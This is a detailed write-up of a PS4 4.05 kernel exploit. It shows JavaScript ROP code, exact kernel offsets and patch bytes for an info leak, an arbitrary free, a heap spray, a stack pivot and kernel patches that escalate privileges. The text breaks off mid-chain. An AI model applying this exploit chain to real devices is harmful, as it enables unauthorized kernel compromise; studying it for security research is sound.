- Table of Contents
- Introduction
- Changes since 1.76
- Stage 1 - Information Disclosure
- Stage 2 - Arbitrary Free
- Stage 3 - Heap Spray/Object Fake
- Stage 4 - Kernel Stack Pivot
- Stage 5 - Building the Kernel ROP Chain
- Stage 6 - Trigger
- Stage 7 - Stabilizing the Object
- Conclusion
NOTE: Let it be said that I do not condone nor endorse piracy. As such, neither the exploit nor this write-up will contain anything to enable piracy on the system.
Welcome to my PS4 kernel exploit write-up for 4.05. In this write-up I will explain in detail how my public exploit implementation works, breaking it down step by step. You can find the full source of the exploit here. The userland exploit will not be covered in this write-up; I have already provided a write-up on it in the past, so if you wish to check that out, click here. Let's jump into it.
Some notable things have changed since firmware 1.76. Most importantly, Sony fixed the bug that let us allocate RWX memory from an unprivileged process. The process we hijack via the WebKit exploit no longer has RWX memory mapping permissions, as JIT is now properly handled by a separate process. Calling sys_mmap() with the execute flag will succeed; however, any attempt to actually execute this memory as code will result in an access violation. This means that our kernel exploit must be implemented entirely in ROP chains, with no C payloads this time.
Another notable change is that kernel ASLR (kASLR) is enabled on firmware versions after 1.76.
New system calls have also been added since 1.76. On 1.76 there were 85 custom system calls; on 4.05 there are 120.
Sony has also removed system call 0, so we can no longer call any system call we like by specifying the call number in the rax register. We will have to use the wrappers provided by the libkernel.sprx module to access system calls.
The first stage of the exploit is to obtain important information from the kernel. To do this, we need a kernel information disclosure (leak). This happens when kernel memory is copied out to the user but the buffer (or at least part of it) is not initialized, so uninitialized memory is copied to the user. If some function called beforehand stored pointers (or any other data) in this memory, they will be leaked. Attackers can use this to their advantage by calling a setup function that leaves specific data behind and then leaking it to craft exploits. This is what we will do, and I take full advantage of this leak to obtain three pieces of information.
I thought I'd include this section to help those who don't know how FreeBSD address prefixes work. It's important to know how to distinguish userland and kernel pointers, and which kernel pointers are stack, heap, or .text pointers.
FreeBSD uses a "limit" to define which pointers are userland and which are kernel. Userland can have addresses up to 0x7FFFFFFFFFFF. A kernel address is denoted by having the 0x800000000000 bit set. In the kernel, the upper 32 bits are set to an address prefix that specifies what type of kernel address it is, and the lower 32 bits hold the rest of the virtual address. The prefixes are as follows, where x can be any hexadecimal digit for the address, and y is an arbitrary hexadecimal digit for the heap address prefix, which is randomized at boot as per kASLR:
- 0xFFFFFFFFxxxxxxxx = Kernel .text pointer
- 0xFFFFFF80xxxxxxxx = Kernel stack pointer
- 0xFFFFyyyyxxxxxxxx = Kernel heap pointer
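As a rough illustration of the prefix rules above, the sketch below classifies a 64-bit address using BigInt arithmetic. The helper name classifyPointer and the sample addresses are made up for this example and are not part of the exploit source.

```javascript
// Hypothetical helper: classify a 64-bit address by the prefixes listed above.
function classifyPointer(addr) {
  const a = BigInt.asUintN(64, BigInt(addr));
  if (a <= 0x7FFFFFFFFFFFn) return "userland";

  const upper32 = a >> 32n;
  if (upper32 === 0xFFFFFFFFn) return "kernel .text";
  if (upper32 === 0xFFFFFF80n) return "kernel stack";

  // The heap prefix is randomized at boot, so only the top 16 bits are fixed.
  if ((a >> 48n) === 0xFFFFn) return "kernel heap";
  return "unknown";
}

// Sample addresses are invented for illustration only.
console.log(classifyPointer(0x00000002000A0000n)); // userland
console.log(classifyPointer(0xFFFFFFFF82309E96n)); // kernel .text
console.log(classifyPointer(0xFFFFFF8012345678n)); // kernel stack
console.log(classifyPointer(0xFFFFA1B212345678n)); // kernel heap
```

The .text and stack checks run before the heap check because all three share the 0xFFFF top bits.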
System call 634, or sys_thr_get_ucontext(), allows you to obtain information on a given thread. The problem is that some areas of the memory copied out are not initialized, and thus the function leaks memory at certain spots. This vector was patched in 4.50, where the buffer is now initialized to 0 via bzero() before it is used.
The biggest issue with this function is that it uses a lot of stack space, so we're very limited in what we can use for our setup function. Our setup function must subtract over 0x500 from rsp all in one go, and whatever we leak will be deep in the code.
This part of the exploit took the most time and research, as it is difficult to know what you are leaking without a debugger. It takes some educated guesses and experimentation to find an appropriate object. Getting the math down perfectly won't do much good either, because functions can change quite significantly between firmwares, especially when it's a jump like 1.76 to 4.05. This step took me around 1-2 months in my original exploit.
To call sys_thr_get_ucontext() successfully, we must create a thread first, an ScePthread specifically. We can do this using a function from libkernel, scePthreadCreate(). The signature is as follows:
scePthreadCreate(ScePthread *thr, const ScePthreadAttr *attr, void *(*entry)(void *), void *arg, const char *name)
On 4.05, we can call this from WebKit at offset 0x11570 in libkernel.
Upon success, scePthreadCreate() should return a valid thread handle, and should fill the buffer passed in to ScePthread *thr with an ScePthread struct - we need this as it will hold the thread descriptor we will use in subsequent calls for the leak.
Unfortunately, you cannot call sys_thr_get_ucontext() on an active thread, so we must also suspend the thread before we can leak anything. We can do this via sys_thr_suspend_ucontext(). The function signature is as follows:
sys_thr_suspend_ucontext(int sceTd)
Calling this in WebKit is simple. We just need to dereference the value at offset 0 of the buffer we provided to scePthreadCreate(); this is the thread descriptor for the ScePthread.
As stated earlier, we need a setup function that uses over 0x500 of stack space between the surface function and any functions it may call. Opening a file (a device, for example) is a good place to look, because open() itself uses a lot of stack space, and it also runs through a bunch of other sub-routines such as filesystem functions.
I found that by opening the "/dev/dipsw" device driver, I was able to leak not only a good object (which I will detail more in the "Object Leak" section below), but also kernel .text pointers. This will help us defeat kASLR for kernel patches and gadgets in our kernel ROP chain (from now on we will abbreviate this as "kROP chain").
Finally, we can call sys_thr_get_ucontext() to get our leak. The signature is as follows:
sys_thr_get_ucontext(int sceTd, char *buf)
We simply pass sceTd (the same one we got from creation and passed to sys_thr_suspend_ucontext()) as the first argument, and a pointer to our buffer as the second argument. When the call returns, we will have leaked kernel information in buf.
First, we want to locate the kernel's .text base address. This will be helpful for post-exploitation. For example, cr0 gadgets are typically only available in kernel .text, as userland does not directly manipulate the cr0 register. We will want to manipulate the cr0 register to disable kernel write protection for kernel patching. How can we do this? We can simply leak a kernel .text pointer and subtract its slide in the .text segment to find the base address of the kernel.
In our buffer containing the leaked memory, we can see that at offset 0x128 we are leaking a kernel .text address. This is also convenient because, as you will see in the next section "Object Leak", it is adjacent to our object leak in memory, so it will also help us verify the integrity of our leak. Because I already had a dump of the 4.05 kernel from my previous exploit, I found the slide of this .text pointer to be 0x109E96. For those curious, it is a pointer to the section in _vn_unlock() where the flags are checked before unlocking a vnode.
A good indication that your slide is correct is that the resulting kernel .text base is aligned to 0x4000, which is the PS4's page size. This means your kernel .text base address should end in '000'.
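The base calculation and alignment check described above can be sketched as follows. The slide 0x109E96 and the 0x4000 alignment come from the text; the function name and the sample leaked pointer are invented for illustration.

```javascript
const TEXT_LEAK_SLIDE = 0x109E96n; // slide of the leaked .text pointer (from the text above)
const PAGE_SIZE = 0x4000n;         // PS4 page size (from the text above)

// Hypothetical helper: returns the kernel base, or null if the result is
// not page-aligned (which suggests the leak was not the expected pointer).
function kernelBaseFromLeak(leakedTextPtr) {
  const base = leakedTextPtr - TEXT_LEAK_SLIDE;
  if ((base & (PAGE_SIZE - 1n)) !== 0n) return null;
  return base;
}

// Made-up leak value for demonstration.
const exampleLeak = 0xFFFFFFFF82309E96n;
console.log(kernelBaseFromLeak(exampleLeak).toString(16)); // ffffffff82200000
console.log(kernelBaseFromLeak(exampleLeak + 0x10n));      // null
```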
Secondly, we need to leak an object in the heap that we can later free() and corrupt to obtain code execution. Some objects are also much better candidates than others. The following traits make for a good object for exploitation:
- Has function pointers. Not needed per se, as you could obtain arbitrary kernel R/W and use that to corrupt some other object, but function pointers are ideal.
- Localized. Ideally you don't want an object that is used by some other area in the kernel, because this could make the exploit racy and less stable.
- Easy to fake. We need an object that we don't need to leak a bunch of other pointers to fake when we heap spray.
- Objects associated to things like file descriptors make for great targets!
At offset 0x130, it seems we leak a cdev_priv object, which is the type of object that represents a character device in memory. It seems this object leaks from the devfs_open() function, which also explains our _vn_unlock() leak at 0x128 for the ASLR defeat.
Unfortunately, not all objects we leak are going to meet the ideal criteria. This object breaks criterion 2, but luckily it meets criterion 3 and we can fake it perfectly. Nothing else will use the dipsw device driver while our exploit runs, meaning that even though our exploit uses a global object, it is still incredibly stable. It also has a bunch of function pointers we can use to hijack code execution via the cdev_priv->cdp_c.si_devsw object, meeting criterion 1.
We can also see that cdev_priv objects are allocated in devfs_alloc(), which is eventually called by make_dev(). Luckily, cdev_priv objects are malloc()'d and not zone allocated, so we should have no issues freeing it.
struct cdev *
devfs_alloc(int flags)
{
    struct cdev_priv *cdp;
    struct cdev *cdev;
    struct timespec ts;

    /* cdev_priv comes from the general-purpose malloc(), not a UMA zone */
    cdp = malloc(sizeof *cdp, M_CDEVP, M_USE_RESERVE | M_ZERO | ((flags & MAKEDEV_NOWAIT) ? M_NOWAIT : M_WAITOK));
    if (cdp == NULL)
        return (NULL);
    // ...
    cdev = &cdp->cdp_c; /* cdev is embedded at the start of cdev_priv */
    // ...
    return (cdev);
}
One last piece of information we need is a stack address. When we stack pivot to run our ROP chain in kernel mode, we need to return to userland cleanly, which means fixing the stack register (rsp) that we broke.
Luckily, because kernel stacks are per-thread, we can use a stack address that we leak to calculate the new return location for when the ROP chain finishes executing. I made this calculation by taking the difference between the base pointer (rbp) at the point where the kernel jumps to our controlled function pointer and a stack pointer that leaks. At offset 0x20 in the leak buffer we can see a stack address, and I found the difference to be 0x3C0.
First, we will create our thread for the sys_thr_get_ucontext() leak, and set its program to an infinite loop gadget so it keeps running. We'll also create a ROP chain for stage 1, where we will open /dev/dipsw and leak, and we'll set up the namedobj for stage 3 as well.
var createLeakThr = p.call(libkernel.add32(0x11570), leakScePThrPtr, 0, window.gadgets["infloop"], leakData, stringify("leakThr"));
p.write8(namedObj, p.syscall('sys_namedobj_create', stringify("debug"), 0xDEAD, 0x5000));
Then to leak, we will suspend the thread, open the /dev/dipsw device driver, and leak the cdev_priv object.
var stage1 = new rop(p, undefined);
stage1.call(libkernel.add32(window.syscalls[window.syscallnames['sys_thr_suspend_ucontext']]), p.read4(p.read8(leakScePThrPtr)));
stage1.call(libkernel.add32(window.syscalls[window.syscallnames['sys_open']]), stringify("/dev/dipsw"), 0, 0);
stage1.saveReturnValue(targetDevFd);
stage1.call(libkernel.add32(window.syscalls[window.syscallnames['sys_thr_get_ucontext']]), p.read4(p.read8(leakScePThrPtr)), leakData);
stage1.run();
For stability purposes, it's good to run an integrity check against your leak before continuing with the exploit, to ensure you're leaking the right object. The check verifies that the base address derived from the kernel .text leak is page-aligned. In one step it lets us both defeat kASLR and confirm that the leak is valid.
// Extract leaks
kernelBase = p.read8(leakData.add32(0x128)).sub32(0x109E96);
objBase = p.read8(leakData.add32(0x130));
stackLeakFix = p.read8(leakData.add32(0x20));
if(kernelBase.low & 0x3FFF)
{
alert("Bad leak! Terminating.");
return false;
}
A combination of design flaws led to a critical bug in the kernel, which allows an attacker to free() an arbitrary address. The issue lies in the idt hash table that Sony uses for named objects. I won't go fully in-depth on the idt hash table, as that's already been covered by fail0verflow's public write-up. The main issue is that Sony stores the object's type as well as its flags in one field, and allows the user to specify it. This means the attacker can cause type confusion, which later leads to an arbitrary free() situation.
By creating a named object with type = 0x5000 (or 0x4000 due to the function OR'ing the ID with 0x1000), we can cause type confusion in the idt hash table. Upon success, it returns an ID of the named object.
When sys_mdbg_service() goes to write bytes passed in from a userland buffer at offset 0x4 to 0x8 to the named object returned, it actually writes to the wrong object due to type confusion. This allows the attacker to overwrite the lower 32 bits of the pointer in the named object with any value.
When sys_namedobj_delete() is called, it first free()'s the pointer at offset 0 of the object before free()ing the object itself. Because we can control 0x4-0x8 in the object via type confusion in sys_mdbg_service(), we can control the lower 32 bits of the pointer that is free()'d here. Luckily, because this object is SUPPOSED to contain a heap pointer at offset 0, the heap address prefix is set for us. If this was not the case, this bug would not be exploitable.
The first thing we need to do is create a named object to put in the idt with the malicious 0x5000 type. We can do that via the sys_namedobj_create() system call like this:
p.write8(namedObj, p.syscall('sys_namedobj_create', stringify("debug"), 0xDEAD, 0x5000));
We need to be able to write to the no->name field of the named object, because when we cause type confusion and delete the object, the address free()'d will be taken from the lower 32 bits of the no->name field. To do this, we can use the sys_mdbg_service() system call, like so:
p.write8(serviceBuff.add32(0x4), objBase);
p.writeString(serviceBuff.add32(0x28), "debug");
// ...
var stage3 = new rop(p, undefined);
stage3.call(libkernel.add32(window.syscalls[window.syscallnames['sys_mdbg_service']]), 1, serviceBuff, 0);
Finally, we need to trigger the free() on the address we wrote via sys_namedobj_delete(). Because the object is cast to a namedobj_dbg_t type, it will free() the address specified at offset 0x4 (which is no->name in namedobj_usr_t). It is remarkable that this is the field that is free()'d, and that the field's upper 32 bits will already be set to the heap address prefix due to it being a pointer to the object's name. If this was not the case, we could not create a use-after-free scenario, as we would not be able to set the upper 32 bits, and this type confusion bug might otherwise be unexploitable.
We can trigger the free() by simply deleting our named object via:
stage3.call(libkernel.add32(window.syscalls[window.syscallnames['sys_namedobj_delete']]), p.read8(namedObj), 0x5000);
In this section I'll briefly explain what heap spraying is for those newer to exploitation. If you already know how it works, feel free to skip this section.
Memory allocators have to be efficient, because allocating brand new memory is costly in terms of performance. To be more efficient, heap memory is typically sectioned into "chunks" (also called "buckets"), and these chunks are typically marked as "used" or "free". To save performance, if an allocation is requested, the kernel will first check to see if it can give you a chunk that's already been allocated (but marked "free") of a similar size before allocating a new chunk.
The chunk sizes are powers of 2 starting at 16, meaning you can get chunks of size 0x10, 0x20, 0x40, 0x80, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000, or 0x4000. You can find these defined in the kmemzones array in FreeBSD's source file responsible for memory allocation, kern_malloc.c.
We can abuse this to control the data of our free()'d object, and thus corrupt it. The cdev_priv object is 0x180 in size, meaning it will use a chunk of size 0x200. So if we continuously allocate, write, and deallocate a chunk of memory of a size above 0x100 and below 0x200, eventually a malloc() call should return the pointer we free()'d while the kernel still holds a reference to it, which means the exploit can write to this pointer and corrupt the backing memory of the object. This is called spraying the heap.
For more information on heap spraying, see here.
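To make the bucket arithmetic concrete, here is a minimal sketch that rounds a request size up to the chunk sizes listed above. The helper mallocBucketSize is hypothetical and only models the size classes; it does not reflect how the real allocator is implemented.

```javascript
// Hypothetical model of the power-of-two size classes (0x10 .. 0x4000).
function mallocBucketSize(size) {
  if (size <= 0 || size > 0x4000) return null; // outside the listed classes
  let bucket = 0x10;
  while (bucket < size) bucket *= 2;
  return bucket;
}

console.log(mallocBucketSize(0x180).toString(16)); // 200 (cdev_priv)
console.log(mallocBucketSize(0x120).toString(16)); // 200 (same class)
console.log(mallocBucketSize(0x100).toString(16)); // 100 (one class too small)
```

Any request that lands in the 0x200 class competes for the same free chunks as the target object, which is what makes the spray work.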
We're going to spray the heap with our fake object that we've created in userland. Our faked object will prevent the kernel from crashing by faking the data we need to, and allow us to obtain code execution by hijacking a function pointer in the object. First let's take a look at the cdev object, which is the first member (inlined) of cdev_priv. For reference, each member is annotated with its offset in the structure.
So as not to make this write-up longer than it needs to be, I will only include some of the pointers that I faked. Other integers in the struct, such as the flags, mode, and time stamp members, I took from dumping the object live.
The cdev object is the core of the cdev_priv object, and contains important information about the device. Notably, it includes the name of the device, its operations vtable, reference counts, and a linked list to previous and next cdev_priv devices.
struct cdev {
void *__si_reserved; // 0x000
u_int si_flags; // 0x008
struct timespec si_atime; // 0x010
struct timespec si_ctime; // 0x020
struct timespec si_mtime; // 0x030
uid_t si_uid; // 0x040
gid_t si_gid; // 0x044
mode_t si_mode; // 0x048
struct ucred *si_cred; // 0x050
int si_drv0; // 0x058
int si_refcount; // 0x05C
LIST_ENTRY(cdev) si_list; // 0x060
LIST_ENTRY(cdev) si_clone; // 0x070
LIST_HEAD(, cdev) si_children; // 0x080
LIST_ENTRY(cdev) si_siblings; // 0x088
struct cdev *si_parent; // 0x098
char *si_name; // 0x0A0
void *si_drv1, *si_drv2; // 0x0A8
struct cdevsw *si_devsw; // 0x0B8
int si_iosize_max; // 0x0C0
u_long si_usecount; // 0x0C8
u_long si_threadcount; // 0x0D0
union {
struct snapdata *__sid_snapdata;
} __si_u; // 0x0D8
char __si_namebuf[SPECNAMELEN + 1]; // 0x0E0
};
The si_name member points to the __si_namebuf buffer inside the object, which is 64 bytes in length. Normally, the string "dipsw" is written here. We're going to overwrite this for our stack pivot, which will be the objective of the next stage. It is important to fix this post-exploit, because other processes that want to open the "dipsw" device driver will not be able to if the name is not set properly, as the device cannot be identified.
p.write8(obj_cdev_priv.add32(0x0A0), objBase.add32(0x0E0));
p.write8(obj_cdev_priv.add32(0x0E0), window.gadgets["ret"]); // New RIP value for stack pivot
p.write8(obj_cdev_priv.add32(0x0F8), kchainstack); // New RSP value for stack pivot
si_devsw is our ultimate target object. It's usually a static object in kernel .text which contains function pointers for all sorts of operations with the device, including ioctl(), mmap(), open(), and close(). We can fake this pointer and make it point to an object we set up in userland, as the PS4 does not have Supervisor Mode Access Prevention (SMAP).
p.write8(obj_cdev_priv.add32(0x0B8), obj_cdevsw); // Target Object
Originally, I spent a lot of time trying to fake the members from 0x120 to 0x180 in the object. Some of these members are difficult to fake, as there are linked lists and pointers to objects that are in completely different zones. We can use a neat trick to avoid having to fake any of this data in our spray. I will cover this more in-depth when we cover the heap spray specifics.
The cdevsw object is a vtable which contains function pointers for various operations such as open(), close(), ioctl(), and many more. Thankfully, because the "dipsw" device driver isn't used while we're exploiting, we can just pick one to overwrite (I chose ioctl()), trigger code execution, and fix the pointer back to the proper kernel .text location post-exploit.
struct cdevsw {
int d_version; // 0x00
u_int d_flags; // 0x04
const char *d_name; // 0x08
d_open_t *d_open; // 0x10
d_fdopen_t *d_fdopen; // 0x18
d_close_t *d_close; // 0x20
d_read_t *d_read; // 0x28
d_write_t *d_write; // 0x30
d_ioctl_t *d_ioctl; // 0x38
d_poll_t *d_poll; // 0x40
d_mmap_t *d_mmap; // 0x48
d_strategy_t *d_strategy; // 0x50
dumper_t *d_dump; // 0x58
d_kqfilter_t *d_kqfilter; // 0x60
d_purge_t *d_purge; // 0x68
d_mmap_single_t *d_mmap_single; // 0x70
int32_t d_spare0[3]; // 0x78
void *d_spare1[3]; // 0x88
LIST_HEAD(, cdev) d_devs; // 0xA0
int d_spare2; // 0xA8
union {
struct cdevsw *gianttrick;
SLIST_ENTRY(cdevsw) postfree_list;
} __d_giant; // 0xB0
};
We're going to overwrite the d_ioctl address with our stack pivot gadget. When we call ioctl() on our opened device driver, the kernel will jump to our stack pivot gadget, run our kROP chain, and cleanly exit.
p.write8(obj_cdevsw.add32(0x38), libcBase.add32(0xa826f)); // d_ioctl - TARGET FUNCTION POINTER
This is another member we must fix post-exploit. If anything else that uses "dipsw" (which is quite a lot of other processes) goes to perform an operation such as open(), it will crash the kernel, because other processes do not have access to WebKit's mapped memory and so cannot reach the faked object in userland.
We can use the ioctl() system call to spray using a bad file descriptor. The system call will first malloc() memory, with the size being specified by the caller via parameter, and will copyin() data we control into the allocated buffer. Due to the bad file descriptor, the system call will then free the buffer and exit with an error. It's a perfect vector for a spray because we control the size and the data being copied in, and the buffer is immediately freed.
The neat trick I mentioned earlier is using a size of 0x120 for our spray's copyin(). Because 0x120 is greater than 0x100 and less than 0x200, the chunk size matches our target object. However, because we are only specifying 0x120 for the copyin(), any data between 0x120-0x180 will not be written, meaning it will not get corrupted. There is no need to fake linked lists or attempt to fake pointers that we can't fake perfectly.
for(var i = 0; i < 500; i++)
{
stage3.call(libkernel.add32(window.syscalls[window.syscallnames['sys_ioctl']]), 0xDEADBEEF, 0x81200000, obj_cdev_priv);
}
stage3.run();
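The 0x120 size is carried inside the command value 0x81200000 itself. The sketch below decodes it using the standard FreeBSD ioctl command layout from sys/ioccom.h (IOC_IN in the top bit, parameter length in bits 16-28). That the PS4 kernel keeps this exact layout is an assumption here, and decodeIoctl is a made-up helper name.

```javascript
// Constants as defined in FreeBSD's sys/ioccom.h.
const IOCPARM_MASK = 0x1FFF;  // 13-bit parameter length
const IOC_IN = 0x80000000;    // kernel copies the parameter in from userland

// Hypothetical helper: pull the direction flag and size out of a command.
function decodeIoctl(cmd) {
  return {
    copiesIn: ((cmd & IOC_IN) >>> 0) !== 0,
    paramLen: (cmd >>> 16) & IOCPARM_MASK,
  };
}

const spray = decodeIoctl(0x81200000);
console.log(spray.copiesIn);              // true
console.log(spray.paramLen.toString(16)); // 120
```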
To execute our ROP chain, we need to pivot the stack to that of our ROP chain. To do this we can use a gadget in the libc module. This gadget loads rsp from [rdi + 0xF8] and pushes [rdi + 0xE0], which we can use to set RIP to the ret gadget. We control the rdi register, as rdi will hold dev, the first argument of d_ioctl(), which points at the cdev object we faked. Below is a snippet of the stack pivot gadget we will use from sceLibcInternal.sprx:
mov rsp, [rdi+0F8h]
mov rcx, [rdi+0E0h]
push rcx
mov rcx, [rdi+60h]
mov rdi, [rdi+48h]
retn
Luckily, 0xE0 and 0xF8 fall inside the __si_namebuf member of cdev, which is a member that can easily be fixed post-exploit.
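As a quick sanity check on those offsets, the sketch below tests whether an 8-byte write at a given offset stays inside __si_namebuf. The start offset 0x0E0 and the 64-byte length come from the struct listing and text earlier; fitsInNameBuf is a hypothetical helper.

```javascript
const NAMEBUF_OFFSET = 0x0E0; // offset of __si_namebuf in struct cdev
const NAMEBUF_SIZE = 64;      // SPECNAMELEN + 1, per the text above

// Hypothetical helper: does a write of `width` bytes at `offset` stay in the buffer?
function fitsInNameBuf(offset, width = 8) {
  return offset >= NAMEBUF_OFFSET &&
         offset + width <= NAMEBUF_OFFSET + NAMEBUF_SIZE;
}

console.log(fitsInNameBuf(0x0E0)); // true  (new RIP slot)
console.log(fitsInNameBuf(0x0F8)); // true  (new RSP slot)
console.log(fitsInNameBuf(0x0B8)); // false (si_devsw, outside the buffer)
```

Note that the buffer ends at 0x0E0 + 64 = 0x120, which is the same boundary as the 0x120 spray size used earlier.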
From devfs_ioctl_f() in /fs/devfs/devfs_vnops.c (src):
// ...
dev_relthread(dev, ref);
// ...
error = dsw->d_ioctl(dev, com, data, fp->f_flag, td);
// ...
This is where the kernel will call the function pointer that we control. Notice rdi is loaded with dev, which is the cdev object we control. We can easily implement this stack pivot in our object fake, like so:
p.write8(obj_cdev_priv.add32(0x0E0), window.gadgets["ret"]); // New RIP value for stack pivot
// ...
p.write8(obj_cdev_priv.add32(0x0F8), kchainstack); // New RSP value for stack pivot
// ...
p.write8(obj_cdevsw.add32(0x38), libcBase.add32(0xa826f)); // d_ioctl - TARGET FUNCTION POINTER
Here is an excellent resource on stack pivoting and how it works for those interested.
Our kROP (kernel ROP) chain is going to be a chain of instructions that we run from supervisor mode. We want to accomplish a few things with this chain. First, we want to apply a few kernel patches to allow us to run payloads and escalate our privileges. Finally, before returning, we'll want to fix the object to stabilize the kernel.
We have to disable the write protection on the kernel .text before we can make any patches. We can use the mov cr0, rax gadget to do this. The cr0 register contains various control flags for the CPU, one of which is the "WP" bit at bit 16. By unsetting this, we can write to read-only memory pages in ring0, such as kernel .text.
// Disable kernel write protection
kchain.push(window.gadgets["pop rax"]); // rax = 0x80040033;
kchain.push(0x80040033);
kchain.push(kernelBase.add32(0x389339)); // mov cr0, rax;
For more information on the cr0 control register, see the OSDev wiki.
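The constant 0x80040033 pushed in the chain is simply a cr0 value with bit 16 cleared. As a small sketch, assuming the starting value was 0x80050033 (that is, identical apart from WP being set, which is an assumption and not stated in the write-up):

```javascript
const CR0_WP = 1 << 16; // Write Protect bit

// Hypothetical helper: clear WP and keep the result as an unsigned 32-bit value.
function clearWriteProtect(cr0) {
  return (cr0 & ~CR0_WP) >>> 0;
}

// 0x80050033 is an assumed "before" value used only for illustration.
console.log(clearWriteProtect(0x80050033).toString(16)); // 80040033
```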
We want to be able to run C payloads and run our loader, so we need to patch the mmap system call to allow us to set the execute bit to map RWX memory pages.
seg000:FFFFFFFFA1824FD9 mov [rbp+var_61], 33h
seg000:FFFFFFFFA1824FDD mov r15b, 33h
These are the maximum permission bits the user is allowed to pass to sys_mmap() when mapping memory. Changing 0x33 in both of these move instructions to 0x37 allows us to specify the execute bit successfully.
// Patch sys_mmap: Allow RWX (read-write-execute) mapping
var kernel_mmap_patch = new int64(0x37B74137, 0x3145C031);
kchain.write64(kernelBase.add32(0x31CFDC), kernel_mmap_patch);
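To see how the two dwords of that int64 map onto the instruction bytes, the sketch below expands them in little-endian order. It assumes the int64 constructor takes the low dword first (consistent with new int64(0xDEAD0000, 0) used elsewhere in this write-up) and that write64 stores the value little-endian; int64ToBytes is a made-up helper.

```javascript
// Hypothetical helper: expand (low, hi) dwords into 8 little-endian bytes.
function int64ToBytes(low, hi) {
  const bytes = [];
  for (const dword of [low, hi]) {
    for (let i = 0; i < 4; i++) bytes.push((dword >>> (8 * i)) & 0xFF);
  }
  return bytes;
}

const patch = int64ToBytes(0x37B74137, 0x3145C031);
console.log(patch.map(b => b.toString(16).padStart(2, "0")).join(" "));
// 37 41 b7 37 31 c0 45 31
```

Read against the disassembly, the first 37 is the new immediate of the first mov (its last byte sits at offset 0x31CFDC), and 41 b7 37 is mov r15b, 37h. The remaining four bytes rewrite whatever followed, which is presumably unchanged from the original code.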
Sony checks and ensures that a syscall instruction can only be issued from the memory range of the libkernel.sprx module. They also check the instructions around it to ensure it keeps the format of a typical wrapper. These patches will allow us to use the syscall instruction in our ROP chain, which will be important for fixing the object later.
The first patch allows kernel processes to initiate syscall instructions. This is because processes have a p_dynlib member that specifies if libkernel has been loaded. This patch makes certain that any module can call syscall even if the libkernel module has not yet been loaded.
seg000:FFFFFFFFA15F5095 mov ecx, 0FFFFFFFFh
Which is patched to
mov ecx, 0x0
The second patch forces a jump below check to fail, so that our first patch is put to use.
seg000:FFFFFFFFA15F50BB cmp rdx, [rax+0E0h]
seg000:FFFFFFFFA15F50C2 jb short loc_FFFFFFFFA15F50D7
Which is patched to
seg000:FFFFFFFFA15F50BB jmp loc_FFFFFFFFA15F513D
This will allow WebKit to issue a syscall instruction directly.
// Patch syscall: syscall instruction allowed anywhere
var kernel_syscall_patch1 = new int64(0x0000000, 0xF8858B48);
var kernel_syscall_patch2 = new int64(0x0007DE9, 0x72909000);
kchain.write64(kernelBase.add32(0xED096), kernel_syscall_patch1);
kchain.write64(kernelBase.add32(0xED0BB), kernel_syscall_patch2);
Our payloads are going to need to be able to resolve userland symbols, so these patches are essential for running payloads.
The first patch removes a check against a member that Sony added to the proc structure that defines if a process can call sys_dynlib_dlsym().
seg000:FFFFFFFFA1652ACF mov rdi, [rbx+8]
seg000:FFFFFFFFA1652AD3 call sub_FFFFFFFFA15E6930
seg000:FFFFFFFFA1652AD8 cmp eax, 4000000h
seg000:FFFFFFFFA1652ADD jb loc_FFFFFFFFA1652D8B
The second patch forces a function that checks if the process should have dynamic resolving to always return 0.
seg000:FFFFFFFFA15EADA0 sub_FFFFFFFFA15EADA0 proc near ; CODE XREF: sys_dynlib_dlsym+F9↓p
seg000:FFFFFFFFA15EADA0 ; sys_dynlib_get_info+1FC↓p ...
seg000:FFFFFFFFA15EADA0 mov rax, gs:0
seg000:FFFFFFFFA15EADA9 mov rax, [rax+8]
seg000:FFFFFFFFA15EADAD mov rcx, [rax+340h]
seg000:FFFFFFFFA15EADB4 mov eax, 1
seg000:FFFFFFFFA15EADB9 test rcx, rcx
seg000:FFFFFFFFA15EADBC jz short locret_FFFFFFFFA15EADCA
seg000:FFFFFFFFA15EADBE test [rcx+0F0h], edi
seg000:FFFFFFFFA15EADC4 setnz al
seg000:FFFFFFFFA15EADC7 movzx eax, al
seg000:FFFFFFFFA15EADCA
seg000:FFFFFFFFA15EADCA locret_FFFFFFFFA15EADCA: ; CODE XREF: sub_FFFFFFFFA15EADA0+1C↑j
seg000:FFFFFFFFA15EADCA retn
seg000:FFFFFFFFA15EADCA sub_FFFFFFFFA15EADA0 endp
This is patched to simply:
seg000:FFFFFFFFA15EADA0 xor eax, eax
seg000:FFFFFFFFA15EADA2 ret
[nop x5]
Patching both of these checks should allow any process, even WebKit, to dynamically resolve symbols.
// Patch sys_dynlib_dlsym: Allow from anywhere
var kernel_dlsym_patch1 = new int64(0x000000E9, 0x8B489000);
var kernel_dlsym_patch2 = new int64(0x90C3C031, 0x90909090);
kchain.write64(kernelBase.add32(0x14AADD), kernel_dlsym_patch1);
kchain.write64(kernelBase.add32(0xE2DA0), kernel_dlsym_patch2);
Our goal with this patch is to create our own syscall under syscall #11. This syscall will allow us to execute arbitrary code in supervisor mode (ring0). It will only have two arguments, the first being a pointer to the function we want to execute. The second argument will be uap, used to pass arguments to the function. This code creates an entry in the sysent table.
// Add custom sys_exec() call to execute arbitrary code as kernel
var kernel_exec_param = new int64(0, 1);
kchain.write64(kernelBase.add32(0xF179A0), 0x02);
kchain.write64(kernelBase.add32(0xF179A8), kernelBase.add32(0x65750));
kchain.write64(kernelBase.add32(0xF179C8), kernel_exec_param);
We don't want the kernel exploit to run more than once, since there is no need to once our custom kexec() system call is installed. To detect this, I decided to patch the privilege check out of the sys_setuid() system call, so we know the kernel has been patched if we can successfully call setuid(0) from WebKit.
seg000:FFFFFFFFA158DBB0 call priv_check_cred
To easily bypass this check, I decided to just replace the call with an instruction that moves 0 into the eax register. The opcodes happened to be exactly the right size.
seg000:FFFFFFFFA158DBB0 mov eax, 0
As you can guess, this also doubles as a partial privilege escalation.
// Add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation)
var kexploit_check_patch = new int64(0x000000B8, 0x85C38900);
kchain.write64(kernelBase.add32(0x85BB0), kexploit_check_patch);
Finally, we want to exit our kROP chain to prevent crashing the kernel. To do this, we need to restore RSP to its value before the stack pivot. As stated earlier, we have a stack leak at 0x20 in the leak buffer, and it's 0x3C0 off from a good RSP value to return to. These instructions will apply the RSP fix by popping the stack leak + 0x3C0 into the RSP register, and when the final gadget returns, normal execution resumes.
// Exit kernel ROP chain
kchain.push(window.gadgets["pop rax"]);
kchain.push(stackLeakFix.add32(0x3C0));
kchain.push(window.gadgets["pop rcx"]);
